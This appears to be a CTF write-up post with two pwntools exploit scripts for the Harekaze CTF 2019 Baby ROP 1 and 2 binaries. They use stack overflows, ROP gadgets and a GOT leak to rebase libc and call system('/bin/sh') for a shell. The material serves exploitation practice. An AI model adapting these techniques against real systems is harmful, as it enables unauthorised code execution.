
Harekaze CTF 2019 Baby ROP 1,2

JeonYoungSin 2019. 8. 1. 20:04

babyrop1_exploit.py


from pwn import *

  

# Solve script for the babyrop1 challenge binary: a stack buffer overflow is
# used to return into a short ROP chain. Every address below is a hard-coded
# constant for this particular (presumably non-PIE) build of the binary;
# nothing is resolved at runtime, so the script only works against that exact file.
# NOTE(review): the script mixes the str literal "A"*... with the bytes returned
# by p64(); that only concatenates under Python 2 pwntools — confirm the intended interpreter.
p = process("./babyrop1")


# Final return target of the chain (named `system` by the author).
system = 0x400490

# Address placed in the first-argument register (named `binsh` by the author).
binsh = 0x601048

# Gadget that pops one value and returns — presumably "pop rdi; ret"; TODO confirm.
pr = 0x400683

# A lone "ret"; presumably inserted to keep the stack 16-byte aligned before the call — confirm.
ret = 0x400479


# Padding: 0x10 bytes of buffer plus 8 bytes of saved frame pointer, presumably,
# so that the next qword overwrites the saved return address.
payload = "A"*(0x10+8)

# Chain order: pop gadget, value for the popped register, alignment ret, target.
payload += p64(pr)

payload += p64(binsh)

payload += p64(ret)

payload += p64(system)


# Wait for the program's "? " prompt before sending the overflow line.
p.sendlineafter("? ",payload)

# Hand the process over to the terminal for the rest of the session.
p.interactive()



babyrop2_exploit.py


from pwn import *


# Solve script for the babyrop2 challenge binary. Unlike babyrop1 this is a
# two-stage chain: stage one leaks a libc address by printing a GOT entry,
# stage two uses the leak to compute libc addresses and call into libc.
# The gadget and return addresses are hard-coded for this specific binary.
# NOTE(review): the str literal "A"*... is concatenated with bytes from p64(),
# which only works under Python 2 pwntools — confirm the intended interpreter.
p = process("./babyrop2")


# Parse the target ELF so GOT/PLT entries can be looked up by name.
e = ELF("./babyrop2")

# The libc pwntools associates with the binary. The offset arithmetic below
# assumes this is the same libc build the process actually loads; if it is
# not, every computed address is wrong.
l = e.libc


# Pop-one-value-and-return gadget — presumably "pop rdi; ret"; TODO confirm.
pr = 0x400733

# A lone "ret", presumably used for stack alignment before PLT calls — confirm.
ret = 0x4004d1

# Candidate one_gadget offsets for the libc. This list is defined but never
# referenced anywhere in the script; the chain below uses system() instead.
one_gadget = [0x4f2c5,0x4f322,0x10a38c]


# Padding: 0x20-byte buffer plus 8 bytes of saved frame pointer, presumably.
payload = "A"*(0x20+8)

# Stage 1: load the address of read's GOT slot as the first argument ...
payload += p64(pr)

payload += p64(e.got["read"])

payload += p64(ret)

# ... and call printf@plt so the slot's contents (read's resolved address) are printed.
payload += p64(e.plt['printf'])

payload += p64(ret)

# Return into the binary at a fixed address afterwards — presumably to re-run
# the vulnerable input routine so a second payload can be sent; TODO confirm.
payload += p64(0x400636)


p.sendlineafter("? ",payload)

# Skip the program's own output up to and including the "!\n" that precedes the leak.
p.recvuntil("!\n")

# Read the leaked pointer: 6 significant bytes of a 64-bit address, zero-padded
# to 8 before unpacking. This assumes the leak follows "!\n" immediately and
# contains no NUL byte in the low 6 bytes; otherwise the value is garbage.
read_addr =  u64(p.recv(6).ljust(8,"\x00"))

# Rebase libc from the leaked read() address using the symbol offset from `l`.
libc_base = read_addr - l.symbols['read']

system_addr = libc_base + l.symbols['system']

# First occurrence of the "/bin/sh" string inside the libc image.
binsh = libc_base + list(l.search("/bin/sh"))[0]


# Stage 2: same overflow, now calling system("/bin/sh") with the computed addresses.
# Note the alignment ret comes first here, before the pop gadget.
payload2 = "A"*(0x20+8)

payload2 += p64(ret)

payload2 += p64(pr)

payload2 += p64(binsh)

payload2 += p64(system_addr)

# Wait for the prompt of the re-entered input routine, then send stage 2.
p.recvuntil("? ")

p.sendline(payload2)

p.interactive()